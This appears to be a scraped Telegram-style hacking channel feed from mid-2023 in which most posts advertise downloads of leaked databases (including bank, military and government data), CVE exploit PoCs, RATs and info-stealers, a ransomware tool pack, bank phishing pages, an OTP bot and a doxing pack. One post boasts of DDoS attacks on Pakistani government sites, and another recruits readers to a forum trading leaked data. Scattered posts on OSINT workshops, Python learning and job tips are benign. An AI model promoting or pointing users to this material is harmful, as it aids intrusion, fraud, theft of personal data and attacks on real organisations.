topic of Darkweb and explain what it is and how it works. You'll gain an understanding of the difference between the surface web, deep web, and dark web and the challenges associated with conducting OSINT investigations in these areas.Finally, we'll wrap up the workshop by discussing Darkweb OSINT and how to conduct investigations in the dark web safely and effectively. You'll learn about the legal and ethical considerations involved in dark web investigations, as well as the tools and techniques used to access and gather information from hidden services.By the end of this workshop, you'll have a solid understanding of OSINT investigations and be able to apply the techniques learned to find valuable information online. Whether you're a student, researcher, or just someone curious about OSINT, this workshop has something for you!Join us for an interactive and informative session where you can enhance your knowledge and skills in OSINT investigations and uncover the truth behind any online activity!Date: June 17th, 2023Venue: OnlineTime: 9:30PM to 10:30PMContact: community.cyberverse@gmail.comRegister Now: https://forms.gle/y46RfWhJ7H3EahBS9
2023-06-15 05:08:34
gmail-osint.activetk.jpGhunt online version.Get info about Google account by email:- name- default profile and cover pictures;- calendar events and timezone;- Google Maps reviews;- Google Plus and Google Chat data;#osint #socmint Images
2023-06-14 18:16:45
https://mega.nz/folder/Ro9zna5I#BwWk-iQnI8JjGTIahNQUpQ Vikash chaudhari bug hunting coursePosted by - @stranger_0_0
2023-06-14 14:50:17
Anyone Taking part in Darkwebathon 2023 BY Team ATII Dm @hacklathon
2023-06-14 14:20:49
🖥Databases:🔱Leak areashopping_eu : https://system32.ink/d/leak-areashopping-eu/🔱Leak sportfood40_ru : https://system32.ink/d/leak-sportfood40-ru/🔱Leak sport-fashion_sk : https://system32.ink/d/leak-sport-fashion-sk/🖥Exploits:🔱Ubuntu 22.04 - udmabuf, CVE-2023-2008 Exploit : https://system32.ink/d/ubuntu-22-04-udmabuf-cve-2023-2008-exploit/🔱CVE-2022-4262: Incorrect Bytecode Generation by JavaScript Parse POC : https://system32.ink/d/cve-2022-4262-incorrect-bytecode-generation-by-javascript-parse-poc/🖥Tools:🔱TheRestarter is a tool is designed to interact with the Windows Restart Manager. : https://system32.ink/d/therestarter-is-a-tool-is-designed-to-interact-with-the-windows-restart-manager/@crackcodes | crackcodes.in | system32.ink | promcracker.me | mcracker.org
2023-06-14 06:48:42
𝙎𝙌𝙇 𝙄𝙣𝙟𝙚𝙘𝙩𝙞𝙤𝙣 𝙊𝙣𝙚𝙡𝙞𝙣𝙚𝙧 ✨𝙇𝙞𝙣𝙠: https://twitter.com/thecybertix/status/1668871896916717569?t=8rci-WOXRRn0PuMxBqsV2g&s=19
2023-06-14 05:33:42
https://hackernoon.com/the-ultimate-guide-to-mastering-nmap-and-netcat/
2023-06-14 05:13:03
CVE-2023-20887 VMWare Aria Operations for Networks unauthenticated RCE Exploithttps://system32.ink/d/cve-2023-20887-vmware-aria-operations-for-networks-unauthenticated-rce-exploit/
2023-06-13 17:38:00
https://youtu.be/M17wwbKxuUQ
2023-06-13 15:12:11
https://www.youtube.com/watch?v=BxYYR3_0X_s
2023-06-13 11:21:24
CrackCodes 🇮🇳 pinned a photo
2023-06-13 11:19:40
🖥Dataleak:🔱Leak Us army DB 9GB : https://system32.ink/d/leak-us-army-db/🔱Sindad_com website database Leak : https://system32.ink/d/sindad-com-website-database-leak/🖥Exploits:🔱CVE-2023-2008 Exploit : https://system32.ink/d/cve-2023-2008-exploit/🖥Tools:🔱onedrive_user_enum v2.00 : https://system32.ink/d/onedrive_user_enum-v2-00/🔱NodeCraw (Web Crawling Application): https://system32.ink/d/nodecraw-web-crawling-application/🖥Bank SCam Pages:👉🏻American Express,👉🏻Bank BNP Paribas👉🏻Bank OF America👉🏻Bankok Bank👉🏻Chase Bank👉🏻Discover Online Bank👉🏻Dubai Islamic Bank👉🏻Halifax UK Bank👉🏻M&T Bank👉🏻MKB Bank👉🏻Rabobank NL👉🏻Sparkasse Bank👉🏻capitalOnehttps://system32.ink/d/all-banks-scam-pages-latest/🖥Course:🔱Station X - The Complete Cyber Security Course - Volumes 1, 2, 3 & 4 : https://system32.ink/news-feed/p/487/🖥Rat & Stealers:🔱EXO STUB Stealer Source Code Leak : https://system32.ink/d/exo-stub-stealer-source-code-leak/🔱Anubis-8.0-RAT : https://system32.ink/d/anubis-8-0-rat/@crackcodes | crackcodes.in |system32.ink | promcracker.me | mcracker.org
2023-06-13 07:57:33
Bykea is likely targeted/compromised by Indian hackers.pakistani biggest bike ride company hacked 😆everyone go to twitter and search for #bykea
2023-06-13 04:46:10
𝘾𝙮𝙗𝙚𝙧𝙩𝙞𝙭 𝙉𝙚𝙬𝙨 : Bugbounty vs AI😍✨𝙇𝙞𝙣𝙠: https://youtu.be/XN5ZyWpurJg
2023-06-12 21:25:11
https://trickypenguin.ink/top-10-best-browsers-for-pc-in-2023/Top 10 Best Browsers for Security and Privacy
2023-06-12 16:41:20
Subject: Invitation to Join DarkForum: Unleash Your Hacking Potential...Dear Hackers...❔We are excited to extend our invitation for you to join DarkForum, a thriving community dedicated to the exploration of hacking, cybersecurity, and digital knowledge. As an aspiring hacker or an experienced cybersecurity enthusiast, DarkForum offers an exceptional platform where you can connect with like-minded individuals, access valuable resources, and contribute your expertise.DarkForum is home to a diverse group of contributors who are passionate about hacking, sharing their knowledge, and pushing the boundaries of cybersecurity. Within our community, you'll find a treasure trove of hacking resources, tools, tutorials, and even leaked data (for educational purposes only), all designed to enhance your skills and expand your understanding of the digital realm.By joining DarkForum, you gain access to a world of opportunities: Hacking Resources: Discover an extensive collection of resources covering a wide range of hacking techniques, methodologies, and tools. Learn about advanced penetration testing, network security, cryptography, and more. Explore the latest hacking trends and stay up-to-date with emerging technologies. Collaboration and Networking: Connect with fellow hackers, share your experiences, and engage in stimulating discussions. DarkForum provides a platform for you to collaborate on projects, exchange ideas, and build professional relationships within the cybersecurity community. Exclusive Leaked Datas: Gain access to a carefully curated collection of leaked data (legally obtained), which serves as an invaluable resource for understanding real-world security breaches and vulnerabilities. Analyze and learn from these incidents to strengthen your own defenses. Contributing and Sharing: As a member of DarkForum, you are encouraged to contribute your own expertise and resources. Share your discoveries, insights, and tools with the community, fostering a spirit of collective learning and growth.To join DarkForum, simply click on the following link: [https://darkforums.me/member.php?action=register&referrer=1570]. The registration process is quick and straightforward, and you'll be granted immediate access to all the resources and discussions that await you.Please note that DarkForum upholds the principles of hacking and responsible information sharing. Take this opportunity to unleash your hacking potential and contribute to the ever-evolving field of cybersecurity. Join DarkForum today and become part of a vibrant community dedicated to expanding knowledge and pushing the boundaries of digital security.We eagerly await your arrival and look forward to witnessing your valuable contributions within DarkForum.Happy hacking!Best regards,☠️ Lèx Légîøn ☠️🌐Dark Forum Contributor & DarkForum Promotor Team
2023-06-12 16:23:23
https://www.crackcodes.in/2023/06/The-Anatomy-of-Remote-Code-Execution-Full-Guide.html
2023-06-12 11:26:11
Must Watch https://youtube.com/clip/UgkxyL6UJN4VhQOGrLceE5Z5IdtP76GMy9cO
2023-06-12 03:26:37
Database:Leak Apple Devices 2023 : https://system32.ink/d/leak-apple-devices-2023/Leak vitaexpress_ru : https://system32.ink/d/leak-vitaexpress-ru/Tools:fruity-frida to rootless iOS : https://system32.ink/d/fruity-frida-to-rootless-ios/guide:RCE Tutorial : https://system32.ink/news-feed/p/480/
2023-06-11 17:12:15
CrackCodes 🇮🇳 pinned a photo
2023-06-11 04:33:28
🖥Dataleak:🔱Leak Alibaba Cloud 💭 : https://system32.ink/d/leak-alibaba-cloud-%f0%9f%92%ad/🔱Leak aub_ma : https://system32.ink/d/leak-aub-ma/🔱Leak pannonhosting_hu: https://system32.ink/d/leak-pannonhosting-hu/🔱Leak astrongameclub_gr : https://system32.ink/d/leak-astrongameclub-gr/🔱Leak dheeramotors_com : https://system32.ink/d/leak-dheeramotors-com/🔱Leak forexchanger_com : https://system32.ink/d/leak-forexchanger-com/🖥Tools:🔱Ransomware tool pack : https://system32.ink/d/ransomware-tool-pack/🔱RedLotus is a Windows UEFI Bootkit in Rust : https://system32.ink/d/redlotus-is-a-windows-uefi-bootkit-in-rust-2/🔱QuillBot-Premium-Crack-2.0.1 : https://system32.ink/d/quillbot-premium-crack-2-0-1/🔱Automatic XSS Vulnerability Scanner, Dorker, and Payload Injector : https://system32.ink/d/automatic-xss-vulnerability-scanner-dorker-and-payload-injector/🖥Exploits:🔱CVE-2023-0630: Slimstat Analytics <4.9.3 – Subscriber + SQL Injection : https://system32.ink/d/cve-2023-0630-slimstat-analytics-4-9-3-subscriber-sql-injection/🔱CVE-2020-3187 Exploit : https://system32.ink/d/cve-2020-3187-exploit/🖥Material: 🔱Doxing Pack : https://system32.ink/news-feed/p/474/🔱recon2023-resources: https://system32.ink/news-feed/p/475/@crackcodes | (crackcodes.in)
2023-06-10 15:04:06
https://youtu.be/yqMYE0XsjeY
2023-06-10 09:25:33
https://www.crackcodes.in/2023/06/Crash-Websites-And-Servers-Using-HTTP-Flooding.html
2023-06-10 03:47:09
🖥Database:🔱Leak shop_goldheart_com : https://system32.ink/d/leak-shop-goldheart-com/🔱Leak bazar365_com : https://system32.ink/d/leak-bazar365-com/🔱Leak bananedu_com : https://system32.ink/d/leak-bananedu-com/🔱Leak clubmaster_com : https://system32.ink/d/leak-clubmaster-com/🔱Leak leroymerlin_fr : https://system32.ink/d/leak-leroymerlin-fr/🔱Leak kprayrada_gov_ua : https://system32.ink/d/leak-kprayrada-gov-ua/🔱Leak kamrairada_gov_ua : https://system32.ink/d/leak-kamrairada-gov-ua/🖥Tools:🔱FSUntether – is a Fucking Simple Untethered code execution PoC for iOS 15,16,17 : https://system32.ink/d/fsuntether-is-a-fucking-simple-untethered-code-execution-poc-for-ios-151617/🖥POCs:🔱CVE-2023-32353: Local privilege escalation via iTunes in Windows : https://system32.ink/d/cve-2023-32353-local-privilege-escalation-via-itunes-in-windows/@crackcodes | (crackcodes.in)
2023-06-09 12:01:21
CrackCodes 🇮🇳 pinned «🖥Dataleak: 🔱Leak auchan(.)ru : https://system32.ink/d/leak-auchan-ru/ 🔱Leak askona(.)ru : https://system32.ink/d/leak-askona-ru/ 🔱Leak Leak book24(.)ru: https://system32.ink/d/leak-book24-ru/ 🔱BSI (Bank Syariah Indonesia) All employeers Leak : https:…»
2023-06-09 07:16:48
https://www.crackcodes.in/2023/06/Cloud-Based-Penetration-Testing-Automation.html
2023-06-09 07:06:55
None
2023-06-09 04:57:25
🖥Database:🔱leak of the airline Lnea Aérea Amaszonas S.A. : https://system32.ink/d/leak-of-the-airline-lnea-aerea-amaszonas-s-a/🔱Leak solicitudesglpi(.)dnsalias(.)net : https://system32.ink/d/leak-solicitudesglpi-dnsalias-net/🔱Leak goldstockcanada(.)com : https://system32.ink/d/leak-goldstockcanada-com/🔱Leak realtimetopup(.)com : https://system32.ink/d/leak-realtimetopup-com/🖥Tools:🔱UTopia is a tool for automatically generating fuzz drivers : https://system32.ink/d/utopia-is-a-tool-for-automatically-generating-fuzz-drivers/🔱Instagram-Lookup : https://system32.ink/d/instagram-lookup/🖥Exploit:🔱libssh CVE-2023-2283 POC exploit : https://system32.ink/d/libssh-cve-2023-2283-poc-exploit/🔱CVE-2023-29336 Win32k Privilege Escalation Vulnerability with PoC : https://system32.ink/d/cve-2023-29336-win32k-privilege-escalation-vulnerability-with-poc/🔱CVE-2023-32353 PoC Exploit : https://system32.ink/d/cve-2023-32353-poc-exploit/@crackcodes crackcodes.in
2023-06-08 17:51:03
https://unit42.paloaltonetworks.com/threat-brief-moveit-cve-2023-34362/
2023-06-08 07:53:00
𝘽𝙪𝙜 𝙏𝙮𝙥𝙚: File Upload Vulnerabilities. 𝙇𝙞𝙣𝙠 : https://youtube.com/shorts/Ayb9y0vbD-g?feature=share
2023-06-08 05:50:14
https://www.crackcodes.in/2023/06/Reverse-Engineering-in-Pentesting.html
2023-06-08 04:54:45
🖥Dataleak: 🔱Leak auchan(.)ru : https://system32.ink/d/leak-auchan-ru/🔱Leak askona(.)ru : https://system32.ink/d/leak-askona-ru/🔱Leak Leak book24(.)ru: https://system32.ink/d/leak-book24-ru/🔱BSI (Bank Syariah Indonesia) All employeers Leak : https://system32.ink/d/bsi-bank-syariah-indonesia-all-employeers-full-database/🔱Leak uprz(.)ru : https://system32.ink/d/leak-uprz-ru/🖥Exploit:🔱CVE-2023-25157 GeoServer SQL Injection – PoC : https://system32.ink/d/cve-2023-25157-geoserver-sql-injection-poc/🔱Public key authentication bypass in libssh POC : https://system32.ink/d/public-key-authentication-bypass-in-libssh-poc/🔱CVE-2023-33829: SCM Manager XSS: https://system32.ink/d/cve-2023-33829-scm-manager-xss/🖥ToolS:🔱SMSCaster a Tool to send Sms with GSM senders : https://system32.ink/d/smscaster-a-tool-to-send-sms-with-gsm-senders/🔱ATM Scanner Vulns : https://system32.ink/d/atm-scanner-vulns/
2023-06-08 02:20:36
🔥Must Read Articles for Every Hacker🔥(Part 1)▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁✅ RoadMap to Become Ethical Hacker/Penetration Tester🔗Link : https://pentestingguide.com/penetration-tester-roadmap/✅ How to Learn Cyber Security Fast🔗Link : https://pentestingguide.com/fastest-way-to-learn-cyber-security/✅ How to Become Successful Bug Bounty Hunter (RoadMap)🔗Link : https://pentestingguide.com/how-to-become-a-bug-bounty-hunter/✅ How to Bypass 2FA & MFA 🔗Link : https://pentestingguide.com/how-to-bypass-2fa-and-mfa/✅ Complete Tutorial of CTF (Beginner to Advance)🔗Link : https://pentestingguide.com/ctf-for-beginners/Learn ¦ Share ¦ Support
2023-06-07 04:15:20
🖥Dataleak:🔱Leak gabo hu : https://system32.ink/d/leak-gabo-hu/🔱Leak pay concord ua: https://system32.ink/d/leak-pay-concord-ua/🔱Leak Ashan Technologies : https://system32.ink/d/leak-ashan-technologies/🔱Leak aminter co th: https://system32.ink/d/leak-aminter-co-th/🔱Leak (ist.edu.pk)Institute_of_Space_Technology Pakistan : https://system32.ink/d/leak-ist-edu-pkinstitute_of_space_technology-pakistan/🖥Rats:🔱Nanocore 2023 Rat : https://system32.ink/d/nanocore-2023-rat/🖥Exploit:🔱CVE-2022-32902 PoC exploit : https://system32.ink/d/cve-2022-32902-poc-exploit/
2023-06-06 06:24:48
𝘽𝙪𝙜 𝙏𝙮𝙥𝙚: URL RedirectionURL redirection is a technique that forwards users from one web address to another, commonly used for website rebranding, page updates, or directing traffic from old URLs to new ones. It ensures a seamless user experience and helps maintain search engine ranking and link equity.𝙇𝙞𝙣𝙠: https://youtu.be/495sxqqFOlsPlease Share your Views & Thanks for your support☺️
2023-06-06 05:04:58
🔱DataLeak:👉🏻Leak memechat app: https://system32.ink/d/leak-memechat-app/👉🏻paybito com Leak : https://system32.ink/d/paybito-com-leak/👉🏻school mos ru Leak: https://system32.ink/d/school-mos-ru-leak/👉🏻tendermines com Leak: https://system32.ink/d/tendermines-com-leak/👉🏻The National University of Taiwan: https://system32.ink/d/the-national-university-of-taiwan/👉🏻Bank of America Leak : https://system32.ink/d/bank-of-america-leak/👉🏻stripchat-com Leak : https://system32.ink/d/stripchat-com-leak/🔱Tools:👉🏻FCBOTv2.0 OTP Bot Source Code : https://system32.ink/d/fcbotv2-0-otp-bot-source-code/🔱Phishing Pages:👉🏻POST BANK WITH LIVE PANEL Phishing Pages : https://system32.ink/d/post-bank-with-live-panel-phishing-pages/
2023-06-05 15:49:46
https://www.crackcodes.in/2023/06/Cloud-Based-Penetration-Testing-Automation.html
2023-06-05 10:30:02
🖥Dataleak:👉🏻MSI (Micro-Star International Co., Ltd) : https://system32.ink/d/leak-msi-micro-star-international-co-ltd/👉🏻Leak cryptofalka : https://system32.ink/d/leak-cryptofalka-hu/
2023-06-05 06:17:19
🖥Database:👉🏻Leak thegrand rentals : https://system32.ink/d/leak-thegrand-rentals/👉🏻Leak bursakameraprofesional co id: https://system32.ink/d/leak-bursakameraprofesional-co-id/👉🏻Leak go3gift com : https://system32.ink/d/leak-go3gift-com/🖥Phishing Pages:👉🏻FUD T-Mobile USA Scampage : https://system32.ink/d/fud-t-mobile-usa-scampage/
2023-06-04 19:01:25
𝘽𝙪𝙜 𝙏𝙮𝙥𝙚: DOM XSS𝙇𝙞𝙣𝙠: https://youtube.com/shorts/CGCI_uar67g?feature=share
2023-06-04 18:25:29
https://gbhackers-com.cdn.ampproject.org/v/s/gbhackers.com/phishing-attack-abuses-zip/?amp_gsa=1&amp_js_v=a9&usqp=mq331AQGsAEggAID#amp_tf=From%20%251%24s&aoh=16859030930902&csi=0&referrer=https%3A%2F%2Fwww.google.com&ampshare=https%3A%2F%2Fgbhackers.com%2Fphishing-attack-abuses-zip%2F
2023-06-04 16:56:20
https://www.crackcodes.in/2023/06/Demystifying-Injection-Attacks-in-Pentesting.html
2023-06-04 13:06:15
DataLeak:👉🏻Leak haztutienda com : https://system32.ink/d/leak-haztutienda-com/👉🏻Leak voiswitch : https://system32.ink/d/leak-voiswitch-net/👉🏻Leak unja.ac.id : https://system32.ink/d/leak-unja-ac-id/Tools:👉🏻Pyrai - Mirai python variant : https://system32.ink/d/pyrai-mirai-python-variant/Exploit:👉🏻CVE-2023-33246 RocketMQ Remote Code Execution Exploit : https://system32.ink/d/cve-2023-33246-rocketmq-remote-code-execution-exploit/
2023-06-04 06:58:47
Injecting scripts into web pagesDraining the theme of injections, chromium extension for working with botsFunctional:Injecting scripts into web pagesCollection of cookies in .json formatSending PUSH notificationsCreate a hidden screenshot of the current browser screenView all installed extensions and enable/disable themGetting the actual URL where the bot is locatedDownload browser history in .json formatUsing the bot’s IP and its cookies (reverse proxy)link https://xss.is/threads/80558/Product price on the forum : 5.000$Download: https://system32.ink/d/injecting-scripts-into-web-pages/
2023-06-04 04:46:11
SO HERE'S THE CHANNEL FOR YOU GUYS WHERE WE WILL GONNA POST ALL POSSIBLE JOBS AND INTERNSHIPS OFFERS IN INDIA FOR FRESHERS AND EXPERIENCED BOTH ✌️🇮🇳👇👇👇👇👇👇👇👇👇👇👇👇👇https://t.me/cyberdemonsindiaDDJTEAM @cyberdemonsindia 🇮🇳JAY SHREE RAAM 🥰
2023-06-04 03:51:30
==================☠️[SITE]: https://mopa(.)gov(.)pk♾️[PROOF]: https://check-host.net/check-report/10228d8bkb16==================☠️[SITE]: https://pifra(.)gov(.)pk♾️[PROOF]: https://check-host.net/check-report/10227de5k96a==================☠️[SITE]: https://pspc(.)gov(.)pk♾️[PROOF]: https://check-host.net/check-report/10227e1fk490==================☠️[SITE]: https://nspp(.)gov(.)pk♾️[PROOF]: https://check-host.net/check-report/102287b0kee8==================☠️[SITE]: http://csa(.)gov(.)pk♾️[PROOF]: https://check-host.net/check-report/10229174kc21==================☠️[SITE]: http://ecopsc(.)gov(.)pk♾️[PROOF]: https://check-host.net/check-report/1022926bkfa8==================☠️[SITE]: https://pbrr(.)gov(.)pk♾️[PROOF]: https://check-host.net/check-report/1022971ak781==================☠️[SITE]: http://ncndt(.)org(.)pk♾️[PROOF]: https://check-host.net/check-report/1022a280ke5d==================☠️[SITE]: https://onsa(.)gov(.)pk♾️[PROOF]: https://check-host.net/check-report/1022a481ke39==================#FuckNato#BLOODNET#Phoenix#PhoenixALLIANCE#DDoS_Attack=========BLOODNET========
2023-06-03 22:11:43
https://www-csoonline-com.cdn.ampproject.org/v/s/www.csoonline.com/article/3698472/attackers-use-python-compiled-bytecode-to-evade-detection.amp.html?amp_gsa=1&amp_js_v=a9&usqp=mq331AQGsAEggAID#amp_tf=From%20%251%24s&aoh=16858302567221&csi=0&referrer=https%3A%2F%2Fwww.google.com&ampshare=https%3A%2F%2Fwww.csoonline.com%2Farticle%2F3698472%2Fattackers-use-python-compiled-bytecode-to-evade-detection.html
2023-06-03 15:00:59
🖥Tools:👉🏻LightsOut : Generate an obfuscated DLL that will disable AMSI & ETWhttps://system32.ink/d/lightsout-generate-an-obfuscated-dll-that-will-disable-amsi-etw/👉🏻Binder Trace is a tool for intercepting and parsing(trace, filter and inspect) Android Binder messages. Think of it as "Wireshark for Binder".Very useful when Android reversing and VR.https://system32.ink/d/%f0%9f%92%a5binder-trace/
2023-06-03 12:16:13
I Want A VPS If SomeOne VPS Seller Contact Me@MynK0x00
2023-06-03 11:12:35
https://www.crackcodes.in/2023/06/Demystifying-Injection-Attacks-in-Pentesting.html
2023-06-03 08:35:03
Real time attempts to break into my servers by attackers trying to guess usernames and passwords. No legitimate services are offered on the addresses receiving these attempts, so there is no chance of a real user accidently submitting their credentials. (Yes things other than SSH occasionally show up)brute.fail
2023-06-03 07:15:35
Leak Databases:👉🏻Leak bamsi org : https://system32.ink/d/leak-bamsi-org/👉🏻Al Tamimi: https://system32.ink/d/leak-tamimi-com/Tools:👉🏻KittyStager: https://system32.ink/members/mcracker2002/activity/392/A simple stage 0 C2. It is made of a web server to host the shellcode and an implant, called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.
2023-06-02 20:26:11
https://youtu.be/rlvDO9mhnl0
2023-06-02 14:51:18
*⚠️ Researchers claim Windows “backdoor” affects hundreds of Gigabyte motherboards ⚠️*_It's a backdoor, Jim, but not as we know it... here's a sober look at this issue._Link:https://nakedsecurity.sophos.com/2023/06/02/researchers-claim-windows-backdoor-affects-hundreds-of-gigabyte-motherboards/via _"Naked Security"_#hacker_bano_chutiya_nhe 🫂
2023-06-02 14:35:36
💥CVE-2017-6195 (SQL-Injection in MOVEit Transfer aka MOVEit DMZ)https://system32.ink/d/cve-2017-6195-exploit/
2023-06-02 13:48:24
🔱Database Leaks: https://system32.ink/f/database/Leak //softjoias.com.br : https://system32.ink/d/leak-softjoias-com-br/Leak //baianomateriais.com.br: https://system32.ink/d/leak-baianomateriais-com-br-2/Leak //papelariaamaral.com.br: https://system32.ink/d/leak-papelariaamaral-com-br/Leak //pensoupneus.com.br: https://system32.ink/d/leak-pensoupneus-com-br/Leak //vlpcomercial.com.br: https://system32.ink/d/leak-vlpcomercial-com-br/🔱Crack Softwares: https://system32.ink/f/crack-tools/Acunetix v15.6 Crack: https://system32.ink/d/acunetix-v15-6-crack/
2023-06-02 10:06:22
https://www.crackcodes.in/2023/06/Guide-to-Utilizing-ChatGPT-for-Pentesters.html
2023-06-02 06:51:26
Here are some suggestions for practicing Python:Write code: One of the best ways to practice Python is to write code. You can start by working through tutorials and exercises to get a feel for the language, and then try writing your own small programs.Solve problems: There are many websites and resources that offer programming challenges and exercises. You can use these to practice your Python skills by solving problems and writing code to solve them.Work on a project: Choose a project that interests you and use Python to build it. This could be a simple program or a more complex application. Working on a project will give you a chance to apply your skills and learn new concepts.Join a community: There are many online communities and forums where you can ask questions and get help with your Python learning. You can also join local meetups or groups to connect with other Python learners and developers.Use online resources: There are many online resources and tutorials available for learning Python. You can use these to learn new concepts and practice your skills.Remember to be patient and persistent as you practice Python. It can take time to become proficient in any new skill, but with practice and dedication, you will improve.
2023-06-02 06:48:10
The easiest way to learn a programming language is to first learn the basics and then try to build something with it (learn by doing). And it's better if you are building something you are actually interested in rather than something out of a book because it will get you to think about the problem and be more meaningful.Python is easy to learn (not much syntax), easy to read (explicit vs implicit), has a big ecosystem (more packages/libraries), is taught at universities so it's easy to find good programmers to help, and is used by many large websites/companies (e.g., Quora is programmed in Python) so it's a good language to know.Online Python Tutorials (in order from introductory to more advanced):"A Byte of Python" http://www.swaroopch.com/notes/PythonGoogle's Into to Python Class (online) - http://code.google.com/edu/languages/google-python-class/"Dive Into Python", by Mark Pilgrim http://diveintopython.org/toc/index.html"The New Boston" Programming Python Tutorials - http://www.youtube.com/user/thenewboston#g/c/EA1FEF17E1E5C0DA"Building Skills in Python", by Steven F. Lott - http://homepage.mac.com/s_lott/books/python/html/index.html"Think Python: How to Think Like a Computer Scientist" - http://www.greenteapress.com/thinkpython/thinkpython.html"Code Like a Pythonista: Idiomatic Python" -http://python.net/~goodger/projects/pycon/2007/idiomatic/handout.htmlOpenCourseWare: MIT 6.00 Introduction to Computer Science and Programming - http://ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-00-introduction-to-computer-science-and-programming-fall-2008/video-lectures.MIT 6.01 Course Readings (PDF) - http://mit.edu/6.01/mercurial/spring11/www/handouts/readings.pdfGoogle's "Understanding Python" (more advanced talk) - http://www.youtube.com/watch?v=HlNTheck1Hk"A Guide to Python's Magic Methods" - http://www.rafekettler.com/magicmethods.html"Metaclasses Demystified" -http://cleverdevil.org/computing/78/Book to Get: "Python Cookbook", by Alex Martelli (http://www.amazon.com/Python-Cookbook-Alex-Martelli/dp/0596007973/)And if you're building something Web based, look at using the Flask Web Framework (http://flask.pocoo.org/docs/).Flask is a modern, lightweight, and well-documented Python Web framework so you won't have to spend much time learning it or fighting with it -- you won't find yourself asking, "Will I be able to do what I want in the framework without hacking it?" Flask let's you program in Python rather than writing to the framework like you typically have to in larger, opinionated framework's like Django and Rails.
2023-06-01 16:30:28
https://www.crackcodes.in/2023/06/CVE-2023-23638%20Exploit.html?m=1
2023-05-31 15:51:48
Hacklido's Bi-Monthly Newsletter's First version is up on Substack! Make sure to subscribe for awesome Newsletter content.https://hacklido.substack.com/p/cyber-security-round-up-may-31st
2023-05-31 11:24:35
𝙐𝙍𝙇 𝙍𝙚𝙙𝙞𝙧𝙚𝙘𝙩𝙞𝙤𝙣 𝙬𝙞𝙩𝙝 𝙩𝙝𝙚 𝙝𝙚𝙡𝙥 𝙤𝙛 𝙉𝙪𝙘𝙡𝙚𝙞 𝙏𝙚𝙢𝙥𝙡𝙖𝙩𝙚. https://twitter.com/thecybertix/status/1663769479652990981?t=bgSiJ--SYpfF_uTnkNHFBw&s=19
2023-05-31 01:39:00
None
2023-05-30 21:12:02
https://hackito.notion.site/OSCP-Practical-Notes-by-Kartik-8126294579314b908fc6e453d480c145
2023-05-30 13:47:47
https://youtu.be/w5Y1gf22YaE
2023-05-30 06:00:12
If SomeOne Have Python Based Hosting Or Any VPS Contact Me @MynK0x00
2023-05-30 01:28:49
None
2023-05-29 18:36:08
✅ Guide for Freshers ✅Here are some tips that can help a fresher get a job easily:🔠Build a strong resume: Your resume is the first thing that employers see, so make sure it is well-written and highlights your key skills and experiences.🔠Network: Reach out to alumni, professors, colleagues, and other professionals in your field. Attend job fairs, networking events, and career expos to get exposure to potential employers.🔠Apply for internships: Internships are a great way to gain work experience and make valuable connections. Apply for internships in your field to gain practical knowledge.🔠Focus on your skills: Employers look for candidates who have relevant skills for the job. Focus on developing skills specific to your field and showcase them in your resume and interviews.🔠Prepare for job interviews: Research the company, dress appropriately, and rehearse answers to common interview questions. Show that you are enthusiastic about the job and willing to learn.🔠Be open to opportunities: Don't limit yourself to only applying for jobs that are exactly what you are looking for. Be open to job opportunities that may not be the exact fit to your skill set, it may open doors for future opportunities.✔️Maintain 5 important skills✔️✅Leadership Skills ✅Technical Skills ✅Communication Skills ✅Managerial Skills ✅Problem Solving Skills 💰Top Companies to join as a fresher💰✔️Google https://buildyourfuture.withgoogle.com/apprenticeships✔️Amazonhttps://www.amazon.jobs/en/landing_pages/apprentices✔️Bain & Companyhttps://www.bain.com/careers/✔️PayPalhttps://careers.pypl.com/university-hiring/university-overview/✔️Microsofthttps://careers.microsoft.com/v2/global/en/students✔️IBM https://www.ibm.com/careers/us-en/early-career/entry-level/✔️Cidinthttps://t.me/cidint✔️Open Aihttps://openai.com/careers/search✔️Adobe https://www.adobe.com/careers/✔️Ciscohttps://jobs.cisco.com/jobs/SearchJobs/✔️Stripe https://stripe.com/jobs/search✔️Roblox https://jobs.roblox.com/careers?domain=roblox.com✔️Nvidiahttps://www.nvidia.com/en-us/research/internships/✔️Coinbasehttps://www.coinbase.com/careers/positions
2023-05-29 05:53:52
𝘽𝙪𝙜 𝙏𝙮𝙥𝙚: Blind XSS 🫣𝙇𝙞𝙣𝙠: https://youtu.be/w5Y1gf22YaE𝙋𝙡𝙚𝙖𝙨𝙚 𝙎𝙝𝙖𝙧𝙚 𝙮𝙤𝙪𝙧 𝙑𝙞𝙚𝙬𝙨 & 𝙎𝙪𝙗𝙨𝙘𝙧𝙞𝙗𝙚 𝙩𝙤 𝙤𝙪𝙧 𝙔𝙤𝙪𝙏𝙪𝙗𝙚 𝙘𝙝𝙖𝙣𝙣𝙚𝙡🙏. 𝙏𝙝𝙖𝙣𝙠𝙨 𝙚𝙫𝙚𝙧𝙮𝙤𝙣𝙚 𝙛𝙤𝙧 𝙮𝙤𝙪𝙧 𝙜𝙧𝙚𝙖𝙩 𝙎𝙪𝙥𝙥𝙤𝙧𝙩🙌☺️
2023-05-29 05:34:36
Kripya @protocolnick ke liye aisi ladki dhundhne ki kripa kareAapki ati kripa hogiDhanyawadLadki milne par inbox kare aapki inaam rashi turant paye
2023-05-27 11:29:30
Link: https://youtu.be/gQ_gmgjEbJ0Learn DOM-XSS Vulnerability 😍
2023-05-25 17:39:01
